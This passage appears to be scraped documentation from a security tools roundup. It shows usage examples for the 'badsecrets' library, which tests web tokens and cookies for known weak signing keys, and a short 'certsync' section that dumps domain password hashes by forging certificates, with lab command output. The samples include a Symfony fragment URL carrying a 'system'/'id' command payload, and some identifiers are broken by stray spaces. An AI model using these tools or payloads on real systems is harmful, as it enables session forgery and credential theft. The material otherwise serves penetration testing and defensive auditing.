oqFeyYpF%2BQEtbp%2F5AMENkFkWUxHZn8NoSlO8P6G6ubSyDdY4QJPaFS4FxNhhm85WlZC9xfEZ1AGSSBOu9JJVYiKxXnL1yYLqrlWp5mfBHZeUBwEa%2FMjGxZEVYDhXo4PiU0jxN7fYmjaobp3DSgA5H3BcFuNG5d8CUnOlQcEie5b%2BUHOpI9zAk7qcuEUXbaZ5Mvh0t2jXCRALRKYDyBdbHlWAFo10dTIM6L3aSTM5uEz9%2FalXLXoWlMo7dTDpuO5bBfTq7YkoPExL3g3JJX47UhuLq85i3%2Bzxfvd7r%2Fmid69kbD3PnX%2Bj0QxaiShhyOZg6jl1HMeRRXvZap3FPCIfxbCf7j2TRqB5gYefBIIdGYjrdiL6HS8SbjXcROMwh2Fxnt505X4jmkmDcGmneU3z%2B84TSSFewcSpxGEGvHVkkU4OaT6vyFwsxCmdrR187tQZ7gn3ZkAiTps%2FfOPcL5QWXja06Z%2FHT3zboq6Hj9v9NBHzpC1eAK0YN8r4V2UMI3P0%2FsIPQYXhovoeLjJwq6snKZTX37ulE1mbS1uOY%2BZrvFYbLN5DdNL%2B%2Bl%2F%2BcWIpc0RSYBLo19xHpKeoeLjU2sxaYzK%2B92D4zKANdPPvsHPqJD1Y%2FBwCL%2FfZKaJfRK9Bj09ez1Z1ixTEKjIRCwuxijnJGq33faZchbwpMPpTfv43jEriGwXwoqOo9Mbj9ggPAil7O81XZxNT4vv4RoxXTN93V100rt3ClXauL%2BlNID%2BseN2CEZZqnygpTDf2an%2FVsmJGJJcc0goW3l43mhx2U79zeuT94cFPGpvITEbMtjmuNsUbOBuw6nqm5rAs%2FxjIsDRqfQxGQWfS0kuwuU6RRmiME2Ps0NrBENIbZzcbgw6%2BRIwClWkvEG%2BK%2FPdcAdfmRkAPWUNadxnhjeU2jNnzI1yYNIOhziUBPxgFEcAT45E7rWvf8gh T08HZvphzytPmD%2FxuvJaDdRgb6a30TjSpa7i%2BEHkIMxM5eH1kiwhN6xkTcBsJ87epGdFRWKhTGKYwCbaYid1nRs7%2BvQEU7MRYghok8KMTueELipohm3otuKo8V4a7w4TgTSBvPE%2BLPLJRwhM8KcjGlcpzF1NowRo6zeJJhbdPpouUH2NJzDcp7P4uUuUB9Cxt9B986My6zDnz1eyBvRMzj7TABfmfPFPoY3RfzBUzDm%2FA9lOGsM6d9WZj2CH0WxqiLDGmP1Ts9DWX%2FsYyqEGK5R1Xpnp7kRIarPtYliecp50ZIH6nqSkoCBllMCCE6JN%2BdoXobTpulALdmQV0%2Bppv%2FAjzIJrTHgX7jwRGEAeRgAxTomtemmIaH5NtV7xt8XS%2BqwghdJl1D06%2FWhpMtJ1%2FoQGoJ0%2F7ChYyefyAfsiQNWsO66UNVyl71RVPwATnbRO5K5mtxn0M2wuXXpAARNh6pQTcVX%2FTJ4jmosyKwhI6I870NEOsSaWlKVyOdb97C3Bt0pvzq8BagV5FMsNtJKmqIIM0HRkMkalIyfow9iS%2B5xGN5eKM8NE4E6hO4CvmpG%2BH2xFHTSNzloV0FjLdDmj5UfMjhUuEb3rkKK1bGAVaaherp6Ai6N4YJQzh%2FDdpo6al95EZN2OYolzxitgDgsWVGhMvddyQTwnRqRY04hdVJTwdhi4TiCPbLJ1Wcty2ozy6VDs4w77EOAQ5JnxUmDVPA3vXmADJZR0hIJEsuxXfYg%2BRIdV4fzGunV4%2B9jpiyM9G11iiesURK82o%2BdcG7FaCkkun2K2bvD6qGcL61uhoxNeLVpAxjrRjaEBrXsexZ9rExpMlFD8e3NM%2B0K0LQJvdEvpWYS5UTG9cAbNAzBs%3DpDsPXFGf2lEMcyGaK1ouARHUfqU0fzkeVwjXU9ORI%2Fs%3D")
if r:
print(r)< br/>else:
print("KEY NOT FOUND :(")
x = Flask_SignedCookies()
print(f"###{str(x.__class__.__name__)}###")
r = x.check_secret("eyJoZWxsbyI6IndvcmxkIn0.XDtqeQ.1qsBdjyRJLokwRzJdzXMVCSyRTA")
if r:
print(r)
else:
print("KEY NOT FOUND :(")
x = Peoplesoft_PSToken()
print(f"###{str(x.__class__.__name__)}###")
r = x.check_secret("qAAAAAQDAgEBAAAAvAIAAAAAAAAsAAAABABTaGRyAk4AdQg4AC4AMQAwABSpxUdcNT67zqSLW1wY5/FHQd1U6mgAAAAFAFNkYXRhXHicHYfJDUBQAESfJY5O2iDWgwIsJxHcxdaApTvFGX8mefPmAVzHtizta2MSrCzsXBxsnOIt9yo6GvyekZqJmZaBPCUmVUMS2c9MjCmJKLSR/u+laUGuzwdaGw3o")
if r:
print(r)
else:
print("KEY NOT FOUND :(")
x = Django_SignedCookies()
print(f"###{str(x.__class__.__name__)}###")
r = x.check_secret(".eJxVjLsOAiEURP-F2hAuL8HSfr-BAPciq4ZNlt3K-O9KsoU2U8w5My8W4r7VsHdaw4zswoCdfrsU84PaAHiP7bbwvLRtnRMfCj9o59OC9Lwe7t9Bjb2OtbMkAEGQtQjekykmJy9JZIW-6CgUaCGsA6eSyV65s1Qya_xGKZrY-wPVYjdw:1ojOrE:bfOktjgLlUykwCIRI pvaTZRQMM3-UypscEN57ECtXis")
if r:
print(r)
else:
print("KEY NOT FOUND :(")
x = Rails_SecretKeyBase()
print(f"###{str(x.__class__.__name__)}###")
r = x.check_secret("dUEvRldLekFNcklGZ3ZSbU1XaHJ0ZGxsLzhYTHlNTW43T3BVN05kZXE3WUhQOVVKbVA3Rm5WaSs5eG5QQ1VIRVBzeDFNTnNpZ0xCM1FKbzFZTEJISzhaNzFmVGYzME0waDFURVpCYm5TQlJFRmRFclYzNUZhR3VuN29PMmlkVHBrRi8wb3AwZWgvWmxObkFOYnpkeHR1YWpWZ3lnN0Y4ZW9xSk9LNVlQd0U4MmFsbWtLZUI5VzkzRkM4YXBFWXBWLS15L00xME1nVFp2ZTlmUWcxZVlpelpnPT0=--7efe7919a5210cfd1ac4c6228e3ff82c0600d841")
if r:
print(r)
else:
print("KEY NOT FOUND :(")
x = Generic_JWT()
print(f"###{str(x.__class__.__name__)}###")
r = x.check_secret("eyJhbGciOiJIUzI1NiJ9.eyJJc3N1ZXIiOiJJc3N1ZXIiLCJVc2VybmFtZSI6IkJhZFNlY3JldHMiLCJleHAiOjE1OTMxMzM0ODMsImlhdCI6MTQ2NjkwMzA4M30.ovqRikAo_0kKJ0GVrAwQlezymxrLGjcEiW_s3UJMMCo")
if r:
print(r)
else:
print("KEY NOT FOUND :(")
x = Telerik_Encrypt ionKey()
print(f"###{str(x.__class__.__name__)}###")
r = x.check_secret("owOnMokk%2F4N7IMo6gznRP56OYIT34dZ1Bh0KBbXlFgztgiNNEBYrgWRYDBkDlX8BIFYBcBztC3NMwoT%2FtNF%2Ff2nCsA37ORIgfBem1foENqumZvmcTpQuoiXXbMWW8oDjs270y6LDAmHhCRsl4Itox4NSBwDgMIOsoMhNrMigV7o7jlgU16L3ezISSmVqFektKmu9qATIXme63u4IKk9UL%2BGP%2Fk3NPv9MsTEVH1wMEf4MApH5KfWBX96TRIc9nlp3IE5BEWNMvI1Gd%2BWXbY5cSY%2Buey2mXQ%2BAFuXAernruJDm%2BxK8ZZ09TNsn5UREutvNtFRrePA8tz3r7p14yG756E0vrU7uBz5TQlTPNUeN3shdxlMK5Qzw1EqxRZmjhaRpMN0YZgmjIpzFgrTnT0%2Bo0f6keaL8Z9TY8vJN8%2BEUPoq%2F7AJiHKm1C8GNc3woVzs5mJKZxMUP398HwGTDv9KSwwkSpHeXFsZofbaWyG0WuNldHNzM%2FgyWMsnGxY6S086%2F477xEQkWdWG5UE%2FowesockebyTTEn3%2B%2FqiVy%2FIOxXvMpvrLel5nVY%2FSouHp5n2URRyRsfo%2B%2BOXJZo7yxKQoYBSSkmxdehJqKJmbgxNp5Ew8m89xAS5g99Hzzg382%2BxFp8yoDVZMOiTEuw0J%2B4G6KizqRW9cis%2FELd0aDE1V7TUuJnFrX%2BlCLOiv100tKpeJ0ePMOYrmvSn0wx7JhswNuj%2BgdKqvCnMSLakGWiOHxu5m9Qqdm3s5sk7nsaxMkh8IqV%2BSzB9A2K1kYEUlY40II1Wun67OSdLlYfdCFQk4ED0N%2BV4kES%2F1xpGiaPhxjboFiiV%2BkvCyJfkuotYuN%2B42CqF yAyepXPA%2BR5jVSThT6OIN2n1UahUnrD%2BwKKGMA9QpVPTSiGLen2KSnJtXISbrl2%2BA2AnQNH%2BMEwYVNjseM0%2BAosbgVfNde2ukMyugo%2FRfrRM27cbdVlE0ms0uXhlgKAYJ2ZN54w1tPWhpGxvZtB0keWpZan0YPh8CBgzsAIMa04HMYLCtgUTqxKqANoKXSy7VIJUzg3fl%2F2WUELjpXK9gRcgexNWDNB1E0rHd9PUo0PvpB4fxSrRpb1LRryipqsuoJ8mrpOVrVMvjracBvtoykK3GrN%2FDUlXkSG%2FAeBQN7HwDJ9QPi3AtEOohp78Op3nmbItXo7IJUSjzBNzUYR8YPj6Ud7Fje9LZSwMBngvgx%2BOKy6HsV4ofOAU2%2FK1%2BfxI0KkCeoSso9NJHWgBD7ijfXUa1Hrc%2FuNU3mTlSSVp3VStQrJbQCkr4paaHYWeeO4pRZCDSBNUzs9qq3TDePwpEQc4QROrw5htdniRk26lFIFm%2Fzk2nC77Pg%2BrkRC1W%2BlRv0lyXsmXVBCe8F1szpWXHCxHNAJwKH%2FBb%2BV1k6AXFXVWPW5vADbXUvRu0s6KLaqu6a0KCB7dt3K2Ni%2FI6O%2FmISYXzknbMrwwakNfajbRF2ibodgR9R9xvoCoCXa3ka7%2Fejr%2BmsZ2HvPKUAffd2fNIWCQrejfpuIoOWiYx6ufN8E41HetCbYfvsI6JQfPOEdOYWI2px%2BLdfO3Nybq99%2BRSQOhjNZakBP54ozlCUfwgpLOmTBwsswZexv1RK5MIi8%2FWtjlJ%2FKjkYxdkFUlwggGS2xDwzcyl2%2FakNCQ5YmxjU8cRY7jZQRMo%2F8uTw5qa2MNZPaQGI18uRgr0i%2FTX3t57fJYCpMLXSaUKIdO7O%2FCQhIyGTS6KrPN%2B3%2FgUb%2BPQ1viGhpnWfGEYF9vhIlK57z8G8G82UQ3DpttD7M 8mQ0KsmCOq75ECx9CWrWGk51vADlm%2BLEZ5oWjVMs%2FThki40B7tL7gzFrBuQksWXYeubMzZfFo4ZQ49di4wupHG5kRsyL2fJUzgpaLDP%2BSe6%2FjCnc52C7lZ3Ls0cHJVf9HRwDNXWM%2B4h8donNy5637QWK%2BV7mlH%2FL4xBZCfU9l6sIz%2FWHMtRaQprEem6a%2FRwPRDBiP65I2EwZLKGY8I%2F1uXJncwC8egLu82JY9maweI0VmJSmRcTf0evxqqe7vc9MqpsUlpSVNh4bFnxVIo5E4PGX70kVaTFe0vu1YdGKmFX5PLvkmWIf%2FnwfgPMqYsa0%2F09trboJ5LGDEQRXSBb7ldG%2FwLdOiqocYKAb91SMpn1fXVPBgkPM27QZxHnSAmWVbJR2%2FIhO%2BIVNzkgFAJlptiEPPPTxuBh%2BTT7CaIQE3oZbbJeQKvRkrt4bawTCOzciU%2F1zFGxubTJTSyInjQ8%2F1tVo7KjnxPKqGSfwZQN%2FeWL6R%2FpvCb%2BE6D4pdyczoJRUWsSNXNnA7QrdjgGNWhyOMiKvkDf3RD4mrXbul18WYVTsLyp0hvQsbdwBWOh7VlwfrWdy%2BklsttFi%2B%2BadKR7DbwjLTcxvdNpTx1WJhXROR8jwW26VEYSXPVqWnYvfyZo4DojKHMSDMbAakbuSJdkGP1d5w0AYbKlAcVQOqp9hbAvfwwLy4ErdIsOg0YEeCcnQVRAXwaCI9JvWWmM%2FzYJzE3X45A6lU9Pe7TAbft810MYh7lmV6Keb5HI6qXFiD%2B8khBZqi%2FsK6485k0a86aWLxOb4Eqnoc41x%2BYPv5CWfvP6cebsENo%3D%2BIUg0f64C4y77N4FZ6C82m5wMpvDQIHqx0ZFIHLhwMg%3D")
if r:
print(r)
else:
print("KEY NOT FOUND :(" )
x = Jsf_viewstate()
print(f"###{str(x.__class__.__name__)}###")
r = x.check_secret("wHo0wmLu5ceItIi+I7XkEi1GAb4h12WZ894pA+Z4OH7bco2jXEy1RSCWwjtJcZNbWPcvPqL5zzfl03DoeMZfGGX7a9PSv+fUT8MAeKNouAGj1dZuO8srXt8xZIGg+wPCWWCzcX6IhWOtgWUwiXeSojCDTKXklsYt+kzlVbk5wOsXvb2lTJoO0Q==")
if r:
print(r)
else:
print("KEY NOT FOUND :(")
x = Symfony_SignedURL()
print(f"###{str(x.__class__.__name__)}###")
r = x.check_secret("https://localhost/_fragment?_path=_controller%3Dsystem%26command%3Did%26return_value%3Dnull&_hash=Xnsvx/yLVQaimEd1CfepgH0rEXr422JnRSn/uaCE3gs=")
if r:
print(r)
else:
print("KEY NOT FOUND :(")
x = Express_SignedCookies()
print(f"###{str(x.__class__.__name__)}###")
r = x.check_secret("s%3A8FnPwdeM9kdGTZlWvdaVtQ0S1BCOhY5G.qys7H2oGSLLdRsEq7sqh7btOohHsaRKqyjV4LiVnBvc")
if r:
print(r)
else:
print("KEY NOT FOUND :(")
x = Laravel_SignedCo okies()
print(f"###{str(x.__class__.__name__)}###")
r = x.check_secret("eyJpdiI6IlhlNTZ2UjZUQWZKVHdIcG9nZFkwcGc9PSIsInZhbHVlIjoiRlUvY2grU1F1b01lSXdveXJ0T3N1WGJqeVVmZlNRQjNVOWxiSzljL1Z3RDhqYUdDbjZxMU9oSThWRzExT0YvUmthVzVKRE9kL0RvTEw1cFRhQkphOGw4S2loV1ZrMkkwTHd4am9sZkJQd2VCZ3R0VlFSeFo3ay9wTlBMb3lLSG8iLCJtYWMiOiJkMmU3M2ExNDc2NTc5YjAwMGMwMTdkYTQ1NThkMjRkNTY2YTE4OTg2MzY5MzE5NGZmOTM4YWVjOGZmMWU4NTk2IiwidGFnIjoiIn0%3D")
if r:
print(r)
else:
print("KEY NOT FOUND :(")
An additional layer of abstraction above check_secret, which accepts a python requests.response object or a string
import requests
from badsecrets import modules_loaded
Telerik_HashKey = modules_loaded["telerik_hashkey"]
x = Telerik_HashKey()
res = requests.get(f"http://example.com/")
r_list = x.carve(requests_response=res)
print(r_list)
telerik_dialogparameters_sample = """
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadDialogOpener, {"_dialogDefinitions":{"ImageManager":{"SerializedParameters":"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","Width":"770px","Height":"588px","Title":"Image Manager"}
"""
r_list = x.carve(body=telerik_dialogparameters_sample)
print(r_list)
from badsecrets.base import check_all_modules
tests = [
"yJrdyJV6tkmHLII2uDq1Sl509UeDg9xGI4u3tb6dm9BQS4wD08KTkyXKST4PeQs00giqSA==",
"eyJoZWxsbyI6IndvcmxkIn0.XDtqeQ.1qsBdjyRJLokwRzJdzXMVCSyRTA",
"vpwClvnLODIx9te2vO%2F4e06KzbKkjtwmNnMx09D1Dmau0dPliYzgpqB9MnEqhPNe3fWemQyH25eLULJi8KiYHXeHvjfS1TZAL2o5Gku1gJbLuqusRXZQYTNlU2Aq4twXO0o0CgVUTfknU89iw0ceyaKjSteOhxGvaE3VEDfiKDd8%2B9j9vD3qso0mLMqn%2Btxirc%2FkIq5oBbzOCgMrJjkaPMa2SJpc5QI2amffBJ%2BsAN25VH%2BwabEJXrjRy%2B8NlYCoUQQKrI%2BEzRSdBsiMOxQTD4vz2TCjSKrK5JEeFMTyE7J39MhXFG38Bq%2FZMDO%2FETHHdsBtTTkqzJ2odVArcOzrce3Kt2%2FqgTUPW%2BCjFtkSNmh%2FzlB9BhbxB1kJt1NkNsjywvP9j7PvNoOBJsa8OwpEyrPTT3Gm%2BfhDwtjvwpvN7l7oIfbcERGExAFrAMENOOt4WGlYhF%2F8c9NcDv0Bv3YJrJoGq0rRurXSh9kcwum9nB%2FGWcjPikqTDm6p3Z48hEnQCVuJNkwJwIKEsYxJqCL95IEdX3PzR81zf36uXPlEa3YdeAgM1RD8YGlwlIXnrLhvMbRvQW0W9eoPzE%2FjP68JGUIZc1TwTQusIWjnuVubFTEUMDLfDNk12tMwM9mfnwT8lWFTMjv9pF70W5OtO7gVN%2BOmCxqAuQmScRVExNd s%2FF%2FPli4oxRKfgI7FhAaC%2Fu1DopZ6vvBdUq1pBQE66fQ9SnxRTmIClCpULUhNO90ULTpUi9ga2UtBCTzI8z6Sb6qyQ52NopNZMFdrn9orzdP8oqFeyYpF%2BQEtbp%2F5AMENkFkWUxHZn8NoSlO8P6G6ubSyDdY4QJPaFS4FxNhhm85WlZC9xfEZ1AGSSBOu9JJVYiKxXnL1yYLqrlWp5mfBHZeUBwEa%2FMjGxZEVYDhXo4PiU0jxN7fYmjaobp3DSgA5H3BcFuNG5d8CUnOlQcEie5b%2BUHOpI9zAk7qcuEUXbaZ5Mvh0t2jXCRALRKYDyBdbHlWAFo10dTIM6L3aSTM5uEz9%2FalXLXoWlMo7dTDpuO5bBfTq7YkoPExL3g3JJX47UhuLq85i3%2Bzxfvd7r%2Fmid69kbD3PnX%2Bj0QxaiShhyOZg6jl1HMeRRXvZap3FPCIfxbCf7j2TRqB5gYefBIIdGYjrdiL6HS8SbjXcROMwh2Fxnt505X4jmkmDcGmneU3z%2B84TSSFewcSpxGEGvHVkkU4OaT6vyFwsxCmdrR187tQZ7gn3ZkAiTps%2FfOPcL5QWXja06Z%2FHT3zboq6Hj9v9NBHzpC1eAK0YN8r4V2UMI3P0%2FsIPQYXhovoeLjJwq6snKZTX37ulE1mbS1uOY%2BZrvFYbLN5DdNL%2B%2Bl%2F%2BcWIpc0RSYBLo19xHpKeoeLjU2sxaYzK%2B92D4zKANdPPvsHPqJD1Y%2FBwCL%2FfZKaJfRK9Bj09ez1Z1ixTEKjIRCwuxijnJGq33faZchbwpMPpTfv43jEriGwXwoqOo9Mbj9ggPAil7O81XZxNT4vv4RoxXTN93V100rt3ClXauL%2BlNID%2BseN2CEZZqnygpTDf2an%2FVsmJGJJcc0goW3l43mhx2U79zeuT94cFPGpvITEbMtjmuNsUbOBuw6nqm5rAs%2FxjIsDRqfQ xGQWfS0kuwuU6RRmiME2Ps0NrBENIbZzcbgw6%2BRIwClWkvEG%2BK%2FPdcAdfmRkAPWUNadxnhjeU2jNnzI1yYNIOhziUBPxgFEcAT45E7rWvf8ghT08HZvphzytPmD%2FxuvJaDdRgb6a30TjSpa7i%2BEHkIMxM5eH1kiwhN6xkTcBsJ87epGdFRWKhTGKYwCbaYid1nRs7%2BvQEU7MRYghok8KMTueELipohm3otuKo8V4a7w4TgTSBvPE%2BLPLJRwhM8KcjGlcpzF1NowRo6zeJJhbdPpouUH2NJzDcp7P4uUuUB9Cxt9B986My6zDnz1eyBvRMzj7TABfmfPFPoY3RfzBUzDm%2FA9lOGsM6d9WZj2CH0WxqiLDGmP1Ts9DWX%2FsYyqEGK5R1Xpnp7kRIarPtYliecp50ZIH6nqSkoCBllMCCE6JN%2BdoXobTpulALdmQV0%2Bppv%2FAjzIJrTHgX7jwRGEAeRgAxTomtemmIaH5NtV7xt8XS%2BqwghdJl1D06%2FWhpMtJ1%2FoQGoJ0%2F7ChYyefyAfsiQNWsO66UNVyl71RVPwATnbRO5K5mtxn0M2wuXXpAARNh6pQTcVX%2FTJ4jmosyKwhI6I870NEOsSaWlKVyOdb97C3Bt0pvzq8BagV5FMsNtJKmqIIM0HRkMkalIyfow9iS%2B5xGN5eKM8NE4E6hO4CvmpG%2BH2xFHTSNzloV0FjLdDmj5UfMjhUuEb3rkKK1bGAVaaherp6Ai6N4YJQzh%2FDdpo6al95EZN2OYolzxitgDgsWVGhMvddyQTwnRqRY04hdVJTwdhi4TiCPbLJ1Wcty2ozy6VDs4w77EOAQ5JnxUmDVPA3vXmADJZR0hIJEsuxXfYg%2BRIdV4fzGunV4%2B9jpiyM9G11iiesURK82o%2BdcG7FaCkkun2K2bvD6qGcL61uhoxNeLVpAxjrRjaEBrXsexZ9rExpMlFD8e3 NM%2B0K0LQJvdEvpWYS5UTG9cAbNAzBs%3DpDsPXFGf2lEMcyGaK1ouARHUfqU0fzkeVwjXU9ORI%2Fs%3D",
"qAAAAAQDAgEBAAAAvAIAAAAAAAAsAAAABABTaGRyAk4AdQg4AC4AMQAwABRhZGwcBykRPNQv++kTK0KePPqVVGgAAAAFAFNkYXRhXHicHYc7DkBQAATnIUqVa3jxLRzApxJBrxA18bmdw1l2k9nZG/Bcxxjt4/An3NnYOVlZOMRL7ld0NAQ9IzUTMy0DeUpMqkYkso+ZGFNiKbRW//Pyb0Guzwtozw4Q",
".eJxVjLsOAiEURP-F2hAuL8HSfr-BAPciq4ZNlt3K-O9KsoU2U8w5My8W4r7VsHdaw4zswoCdfrsU84PaAHiP7bbwvLRtnRMfCj9o59OC9Lwe7t9Bjb2OtbMkAEGQtQjekykmJy9JZIW-6CgUaCGsA6eSyV65s1Qya_xGKZrY-wPVYjdw:1ojOrE:bfOktjgLlUykwCIRIpvaTZRQMM3-UypscEN57ECtXis",
"eyJhbGciOiJIUzI1NiJ9.eyJJc3N1ZXIiOiJJc3N1ZXIiLCJVc2VybmFtZSI6IkJhZFNlY3JldHMiLCJleHAiOjE1OTMxMzM0ODMsImlhdCI6MTQ2NjkwMzA4M30.ovqRikAo_0kKJ0GVrAwQlezymxrLGjcEiW_s3UJMMCo",
"dUEvRldLekFNcklGZ3ZSbU1XaHJ0ZGxsLzhYTHlNTW43T3BVN05kZXE3WUhQOVVKbVA3Rm5WaSs5eG5QQ1VIRVBzeDFNTnNpZ0xCM1FKbzFZTEJISzhaNzFmVGYzME0waDFURVpCYm5TQlJFRmRFclYzNUZhR3VuN29PMmlkVHBrRi8wb3AwZWgvWmxObkFOYnpkeHR1YWpWZ3lnN0Y4ZW9xSk9LNVlQd0U4MmFsbWtLZUI5VzkzRk M4YXBFWXBWLS15L00xME1nVFp2ZTlmUWcxZVlpelpnPT0=--7efe7919a5210cfd1ac4c6228e3ff82c0600d841",
"https://localhost/_fragment?_path=_controller%3Dsystem%26command%3Did%26return_value%3Dnull&_hash=Xnsvx/yLVQaimEd1CfepgH0rEXr422JnRSn/uaCE3gs=",
"s%3A8FnPwdeM9kdGTZlWvdaVtQ0S1BCOhY5G.qys7H2oGSLLdRsEq7sqh7btOohHsaRKqyjV4LiVnBvc"
]
for test in tests:
r = check_all_modules(test)
if r:
print(r)
else:
print("Key not found!")
import requests
from badsecrets.base import carve_all_modules
### using python requests response object
res = requests.get(f"http://example.com/")
r_list = carve_all_modules(requests_response=res)
print(r_list)
### Using string
carve_source_text = """
<html>
<head>
<title>Test</title>
</head>
<body>
<p>Some text</p>
<div class="JWT_IN_PAGE">
<p>eyJhbGciOiJIUzI1NiJ9.eyJJc3N1ZXIiOiJJc3N1ZXIiLCJVc2VybmFtZSI6IkJhZFNlY3JldHMiLCJleHAiOjE1OTMxMzM0ODMsImlhdCI6MTQ2NjkwMzA4M30.ovqRikAo_0kKJ0GVrAwQlezymxrLGjcEiW_s3UJMMCo</p>
</div>
</body>
</html>
"""
r_list = carve_all_modules(body=carve_source_text)
print(r_list)
Nothing would make us happier than getting a pull request with a new module! But the easiest way to contribute would be helping to populate our word lists! If you find publicly available keys help us make Badsecrets more useful by submitting a pull request to add them.
Requests for modules are always very welcome as well!
certsync
is a new technique in order to dump NTDS remotely, but this time without DRSUAPI: it uses golden certificate and UnPAC the hash. It works in several steps:
$ certsync -u khal.drogo -p 'horse' -d essos.local -dc-ip 192.168.56.12 -ns 192.168.56.12
[*] Collecting userlist, CA info and CRL on LDAP
[*] Found 13 users in LDAP
[*] Found CA ESSOS-CA on braavos.essos.local(192.168.56.23)
[*] Dumping CA certificate and private key
[*] Forging certificates for every users. This can take some time...
[*] PKINIT + UnPAC the hashes
ESSOS.LOCAL/BRAAVOS$:1104:aad3b435b51404eeaad3b435b51404ee:08083254c2fd4079e273c6c783abfbb7:::
